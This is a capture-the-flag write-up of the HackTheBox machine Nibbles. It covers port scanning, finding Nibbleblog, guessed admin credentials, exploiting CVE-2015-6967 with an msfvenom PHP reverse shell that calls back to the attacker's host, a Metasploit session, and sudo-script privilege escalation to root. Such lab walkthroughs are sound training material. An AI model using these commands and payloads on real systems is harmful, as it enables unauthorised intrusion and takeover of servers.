Recon
nmap
1
2
3
4
5
6
7
8
9
10
11
12
|
nmap -A -sV -Pn 10.10.10.75
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
We are face of website with an Hello world!.
gobuster
No result from gobuster. I was not able to find any directories or files.
After some time, I manage to search if Nibbles ou Nibble was a webservice or an application that I did not know about. I found that Nibbleblog is an engine written in php for creating blogs.
We can then find the link to the main page at: http://10.10.10.75/nibbleblog/
Screenshot of the nibbleblog page
We retry the gobuster scan.
1
2
3
4
5
6
7
8
9
|
===============================================================
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
===============================================================
|
Vulnerabilities
Thanks to exploitdb, we can see that there are 2 vulnerabilities listed for Nibbleblog.
1
2
3
4
5
6
7
|
└─$ searchsploit nibble
-------------------------------------------------------------------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
-------------------------------------------------------------------------------------------
|
One of the vulnerability has been attributed to CVE-2015-6967. I found an exploit on github, let’s try it!
Exploit
For the exploit, we need to provide:
- url
- username
- password
- payload
Navigating throught directories I found a users.xml file that contains a user, here admin.
Trying some default and some guessed password on the admin login page http://10.10.10.75/nibbleblog/admin.php, I found those credentials admin:nibbles.
For the payload, I manage to use msfvenom to create a php reverse shell. Then I provide this payload to the python script.
1
2
3
4
5
6
7
|
# creating our php reverse shell payload
└─$ msfvenom -p php/reverse_php LHOST=10.10.16.6 LPORT=4444 > shell.php
└─$ python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.
|
The exploit seems to be successfull. We can see that an image has been uploaded. It correspond to our reverse shell.
We simply go to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php to try to get our shell. Don’t forget to listen on the port specify on the payload with netcat.
We got a shell! We are connected with the user nibbler, we can now get the user flag.
1
2
3
4
5
|
whoami
nibbler
cat /home/nibbler/user.txt
*************************7564559
|
We can load the multi/http/nibbleblog_file_upload module on the Metasploit console. Then, enter our options.
| Name |
Value |
| USERNAME |
admin |
| PASSWORD |
nibbles |
| TARGETURI |
/nibbleblog |
1
2
3
4
5
6
|
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit
[*] Started reverse TCP handler on 10.10.XX.X:4444
[*] Sending stage (39927 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.XX.X:4444 -> 10.10.10.75:37934) at 2022-08-05 22:06:44 +0200
|
We are now in! Let’s continue to the privesc.
Privesc
Checking user sudo privileges, we can see that nibbler can execute the script monitor.sh in root in that directory: /home/nibbler/personal/stuff/.
1
2
3
4
5
6
|
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
|
We juste have to invoke a shell throught that file.
1
2
3
4
5
6
7
|
$ mkdir -p /home/nibbler/personal/stuff/
$ echo "/bin/bash" > monitor.sh
$ chmod +x monitor.sh
$ sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
*************************0da949e
|
We are now system owner !
Easy, External, Nibbleblog, Penetration Tester Level 1, CVE Exploitation, CVE-2015-6967, A06:2021-Vulnerable And Outdated Components, User Enumeration, Sudo Exploitation, Public Vulnerabilities, Security Tools
